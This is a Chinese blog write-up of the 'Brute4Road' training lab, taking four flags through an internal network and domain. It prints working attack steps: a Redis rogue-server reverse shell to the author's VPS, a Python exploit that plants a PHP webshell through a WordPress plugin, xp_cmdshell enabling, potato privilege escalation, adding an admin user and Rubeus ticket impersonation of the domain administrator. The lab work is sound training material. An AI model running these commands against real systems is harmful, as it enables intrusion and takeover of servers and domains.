WP-春秋云镜-Brute4Road靶场通关完全指南

已于 2023-01-03 18:06:47 修改
阅读量2.5k 收藏 1
点赞数 3
分类专栏: 靶场 文章标签: redis 数据库 缓存
于 2022-12-30 14:57:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45234543/article/details/128482984
版权

Flag1

废话不多说,开启靶场给了个IP
Fscan扫一波
发现了Redis未授权,之前写过一篇文章阐述过Redis未授权的四种利用方式
Redis未授权四种利用方式
在这里插入图片描述在这里插入图片描述先使用写入ssh认证方式看是否可以写入
config set dir /root/.ssh
提示权限不够,则直接考虑主从模式获取rce
这里使用redis-rogue-server获取rce

git clone https://github.com/n0b0dyCN/redis-rogue-server.git
python3 redis-rogue-server.py --rhost 47.92.212.201 --lhost 38.47.100.xxxx # lhost是你vps的地址

在这里插入图片描述
上图注释掉的是vps地址,监听8888端口,然后在弹回的shell执行python伪终端
python -c ‘import pty; pty.spawn(“/bin/bash”)’
在这里插入图片描述
成功获取shell
在redis目录下发现了flag01,但是查看权限不够,需要提权
在这里插入图片描述

find / -user root -perm -4000 -print 2>/dev/null

在这里插入图片描述发现base64存在root权限
在这里插入图片描述
flag01: flag{2eca9677-7e51-49be-a0b3-axxxxxxx}

flag02

传frp,将流量代出来

在这里插入图片描述挂全局代理
在这里插入图片描述对172.22段进行扫描
在这里插入图片描述看结果,有两个kennel可以利用,mssql和wordpress
使用wpscan扫描wordpress站点
发现公开漏洞
https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a

import sys

import binascii

import requests



# This is a magic string that when treated as pixels and compressed using the png

# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file

payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'



def encode_character_code(c: int):

    return '{:08b}'.format(c).replace('0', 'x')



text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]



destination_url = 'http://172.22.2.18/'

cmd = 'ls'



# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.

requests.get(

    f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"

)



# We have uploaded a webshell - now let's use it to execute a command.

print(requests.post(

    f"{destination_url}webshell.php?1=system", data={"2": cmd}

).content.decode('ascii', 'ignore'))

写入webshell
在这里插入图片描述在这里插入图片描述查看数据库配置文件
在这里插入图片描述连接数据库获得flag2
在这里插入图片描述

flag03

在上一个数据库中发现了password字典,把字典拉下来,用来爆破下mssql
暴力破解获得了mssql的账户密码

在这里插入图片描述连接进入,打开xp_cmdshell

select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' #返回1即存在
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; #启用cmdshell
exec master..xp_cmdshell 'whoami' #执行命令

在这里插入图片描述Ladon48.exe BadPotato “whoami” #提权
在这里插入图片描述创建新用户
在这里插入图片描述C:/迅雷下载/Ladon48.exe BadPotato "net localgroup administrators test /add" # 加到管理组
远程桌面连接进入
在这里插入图片描述

在administrators目录下发现flag03
在这里插入图片描述

flag04

进行信息收集,发现存在域
在这里插入图片描述
ping域即可定位域控在172.22.2.3
在这里插入图片描述上mimikatz读密码
看是否可以读到域用户密码

在这里插入图片描述使用Rubeus申请访问自身的可转发服务票据
.\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:bd2cf5e6a8f89ed5b02d3d7fcf5e88c7 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap > 1.txt
在这里插入图片描述

通过Rubeus的S4U2Self协议代表域管理员申请针对域控LDAP服务的票据并注入内存
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE1AkncvWu9Oq61AalKFDmotwRbaGa1WWfrl3/5ylhbJrec4y9oTKUHqv2FndcyFONaFAAx3HiYxOUKQgOhNA+U2OgZHS6TjsAnpoK4Z0kMmFKRWy7gPWyUpC2x0vxSHXRvp1nwSVeupp6Ky5aAn7qwQpZ+73V0Vvrih0iNc3QfPHDU2TAVOBue5BCdbFIwg6qW/4fubvq5kYGutWAppskvt6kTIIVgBobF+ngdNsouAT4QIIqUT0ok/Oepw6UpY56DSwwydOkzoUX7Jzx6V+ddRKFB7PJDejSvnxoi95D+QKSCsq7cFyerZUYTTfFf6vp2fEYeNlfHRo/kdpNPKcGGK+lrV6FA/F0PhtXdc2eWY4TKL8cZ1qwlKiZocDyXk0ZYBeEzT3PdhZNw5FQFRnYi47eVgi9/zTXZ/vgRgL9QWlp5WkAcebgJmkjWhc2I3RXmJJlxgQxufVjG6PRi1b6kOa0evnYVCFs9qAOPkBti8YMqVeSfvseu8BVqQfMEVCa1Tb9zo5XJ6ej3nI5zJkLSkO1ZLgw7qd9bsLxzi0RGQLqc03ZYsYIIKuMPfp0E+pB1cjQwDOBdUbru/zOGzJ7w9kgp7bUHex2V+4rtHwNPGmVgfiHCV+qSXTIADhWbbpenZi48CtTETS0iqNw3Z/kN0+vD1HbwduDP6HK9Bro/gzbJ640gksqQUhpCTGPSlkexam5z2af3hivn6XYwHgTnXtq7N1JKY7+jKV0qn2QkVL/SBr/I7j/WNg6Ffqr10eBdNlfQqpvlYBt1lIfp/4avyWo6zacie6zp3+i7ZSl9UA5lhlkpkZpl14wlGGZgw2fbaRce3E9j/HOHfg8LcBQGAnV0BrPWd/EZCkXU42TzGIZVAm38WLmQB9e40LVgkPTRiJi091pxuRlIVHZDIg7UepmLRIo3Vv/Js1d2x/hfXiXoqHq+BKDyVZbx7U76heewAp/1UUTLE8+A0jUV63tjM/uz9kR/qaKDjBbWGeXWMHjlw9m6fBd4n0WgzZIXVQurDcfs7ZjGZbIApAI414UN8AdERD0HPCMa99qRF0un2MLfwFP3aptuSdau3qPK6PkgBrBTJSEBsq5hwddRlxJPnTjkM8iIn4G9dvrWZdENeBHBPVDg6f0gfoNqswaOMYZSVqBc9csdZ3ZD6XsCOu/80cVgWKrNOvXsjVGjUfXMKyid+O9FavYrSMMFqg6XlIjA3aRZ1frSxAj9dowz2zoK+bh/NmxFSlaQ9Yxe94HViw5UlDwAxxlezIyCJsCXdMZjlM1+qPVaJ9D/1ko/STJ5zZhhnWgncH5HA71IamhCa7UDTVZhdSr3EmvOIvyHzO8DICPcMgJ/Qw6MxPmjoLg68PnFqrsg9qFVtGkk32e+rEQneZd7YjJSIHR5Z0Mnt31rNquvprsjWuXJLaQyH33iaKyIZZifKU8LMVeQQ1nJF5NiZNdEi9Cgg9r5SuHWjgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBDrHzkTjelV3zTu2oS5aKgSoQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDIzMDEwMzA5NTczMFqmERgPMjAyMzAxMDMxOTU3MzBapxEYDzIwMjMwMTEwMDk1NzMwWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==
在这里插入图片描述
之后执行
type \\DC.xiaorang.lab\C$\Users\Administrator\flag\flag04.txt
即可看见flag04
在这里插入图片描述

雲深拾月
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 13
    评论
专栏目录
block-a-brute:阻止ssh暴力破解者
05-12
硬块 这是一个命令行工具,用于阻止进行SSH暴力破解尝试的IP地址。 它使用auth.log查找SSH登录尝试,并通过抓取获取IP地理位置信息,并使用良好的iptables阻止IP地址。 通常,我需要查看Geoip信息来确定是否应阻止IP地址。 如果您想要更自动化和更成熟的产品,请查看 。 如果您想对要阻止的主机(例如蜜罐或敏感的公共服务器)做出艰难的决定,则此工具很有用。 白名单 可以包括一个whilelist文件,以使粗制滥造忽略某些主机。 IP应该在单独的行中列出,如下所示: # home 1.2.3.4 # work 5.6.7.8 用法 $ ./block-a-brute.py --help usage: block-a-brute.py [-h] [-w WHITELIST] [-l LOG] [-y] block-a-brute - block SSH bruteforc
nodejs-modulo17-novo:使用express-brute,express-brute-redis,Helmet,Node Redis,Rate Limit Redis,CORS,GitHub和Greenkeeper的Node.js中的安全性
04-30
Node.js-模块17(新) 使用express-brute,express-brute-redis,Helmet,Node Redis,Rate Limit Redis,CORS,GitHub和Greenkeeper的Node.js中的安全性。 注意:此存储库是的副本,用于在Node.js中执行安全性方法。 指数 设置环境变量 项目执行 队列侦听器执行 在项目中使用 图书馆 蜜蜂 工具 发展 环境设定 单击此处,然后按照“ Configuração de Ambiente 。 项目安装 单击此处,然后按照Instalação de Projeto 。 设置环境变量 单击 此处,然后按照“ Configuração de Variáveis de Ambiente 。 项目执行 单击此处,然后按照Execução de Projeto para Desenvolviment
13.Brute-Force算法与KMP算法.ppt
03-02
13.Brute-Force算法与KMP算法.ppt
360众测靶场题库之85- WordPress插件漏洞分析溯源,2024年最新5分钟搞定
最新发布
2401_83974087的博客
04-13 291
字段爆出来之后,便可以利用用户名和密码登录WordPress后台。看到插件一栏,点击修改comment-rating插件的PHP源文件,需要注意,修改的源文件最好是已启用的,添加一句话木马:,下一步就是菜刀连了。
0-1planning.rar_brute force_delphi brute_穷举法求解0-1
09-19
delphi开发的0-1规划求解代码,界面美观,使用简单,采用的是穷举法
bruteforce-bitcoin-brainwallet-master_bruteforce_源码
10-02
brainwallet brute force python
靶场练习--春秋云境-Brute4Road
NoooEmotion的博客
01-28 1916
Brute4Road是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
WP-春秋云镜-Unauthorized靶场完全通关指南
qq_45234543的博客
11-23 1357
Unauthorized靶场完全通关指南,手把手教学拿到3个flag
春秋云境】CVE-2022-25099靶场WP和CVE-2022-24663靶场WP
果粒程
12-01 673
春秋云境】CVE-2022-25099靶场WP和CVE-2022-24663靶场WP
春秋云镜-【仿真场景】Brute4Road writeup
渗透测试研究中心
03-07 991
说明Brute4Road是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。技术RedisBrute Force、SMB、Privilege Elevation、域渗透第一个flagredis主从复制RCEf...
春秋云境】CVE-2021-44983靶场WP和CVE-2021-40282靶场WP
果粒程
12-14 526
春秋云境】CVE-2021-44983靶场WP和CVE-2021-40282靶场WP
RoadApp:RoadApp是一个用于道路维护的参数化调度平台-开源
06-01
RoadApp 是为 iSTEM Geauga ECHS 的 2020 年Spring设计挑战创建的道路维护参数化调度平台。 在这个应用程序中,导入的数据与参数和权重(由用户定义)结合使用,对每条道路进行评分和排序。 分数计算为加权算术平均值。 该程序的输出是从最高分到最低分排序的道路列表。 这旨在用作道路维护计划的优先级列表 - 此应用程序的主要目标。 免责声明:我不是专业的开发人员,这个项目在整个过程中发生了很大的变化(就像任何编程项目一样),所以这段代码非常混乱。 此外,由于该程序是为学校项目编写的,因此我不希望事后更新代码。
靶场wp
东方
09-24 942
1 代码审计: http://xuptnetsec.site:8089/first/index.php?tdsourcetag=s_pcqq_aiomsg 代码审计题: <?php /** * from Guardian oath * **/ show_source(__FILE__); include "flag.php"; $data=array(); $pas...
计科练习13题解(最短路径)
Y_yunhu的博客
07-17 782
XP的点滴:https://blog.csdn.net/Y_yunhu/article/details/84714635 丛林小道 题目描述 The Head Elder of the tropical island of Lagrishan has a problem. A burst of foreign aid money was spent on extra roads betw...
春秋云镜靶场Initial-WriteUP 专业徽章手把手教学
qq_45234543的博客
11-17 3620
春秋云镜靶场Initial-WP,专业徽章,完整flag获取教程
leetcode 514. Freedom Trail
淡然坊
08-27 776
In the video game Fallout 4(辐射4), the quest(追寻,探索) "Road to Freedom" requires players to reach a metal dial(表盘,拨号盘) called the "Freedom Trail Ring", and use the dial to spell a specific keyword in ord
春秋云镜 CVE-2022-32991 Web Based Quiz System v1.0 [超详细新手教程]
starttv的博客
10-26 732
Web Based Quiz System v1.0 通过welcome.php 中的eid 参数被发现包含一个SQL 注入漏洞。
[春秋云镜] CVE-2022-28060 详细讲解
weixin_60374959的博客
11-28 2638
Victor CMS v1.0 /includes/login.php 存在sql注入。
春秋云境Brute4Road-WP【一遍过】
weixin_63576152的博客
10-12 270
ps:为方便操作,可以用msfvenom生成正向shell,上传到靶机运行,再利用msfconsole获得shell,这样就能在kali上操作了。首先通过Rubeus申请机器账户MSSQLSERVER的TGT,执行后,将得到 Base64 加密后的 TGT 票据。在/home/redis/flag目录下发现了flag01,但是没有cat的权限。发现Redis未授权和ftp匿名账号登陆,这里用Redis主从rce的方式打(正常情况下:输入r后依次输入vps的ip和端口2,端口2必须是vps上开放的。
ssti-lab靶场通关
09-02
为了通关ssti-lab靶场,你可以按照以下步骤进行操作: 1. 首先,从上一个数据库中找到的password字典中获取到mssql的账户密码。 2. 使用这个账户密码进行mssql的暴力破解,以获得访问权限。 3. 一旦你获得了访问权限,你可以使用SSTI有效载荷发生器来执行特定类型的Java SSTI攻击。该有效载荷发生器可以生成针对Java SSTI的payload,启发于${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)...}。 4. 另外,你还可以使用Rubeus工具来申请访问自身的可转发服务票据。通过运行命令".\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:bd2cf5e6a8f89ed5b02d3d7fcf5e88c7 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap > 1.txt",你可以生成一个可转发的服务票据文件,以便在后续攻击中使用。 通过以上步骤,你可以成功通关ssti-lab靶场。请注意,在进行任何攻击前,确保你有合法的授权和使用权,并且遵守法律法规。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [WP-春秋云镜-Brute4Road靶场通关完全指南](https://blog.csdn.net/qq_45234543/article/details/128482984)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [ssti-payload:SSTI有效载荷生成器](https://download.csdn.net/download/weixin_42128558/15099898)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 13
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值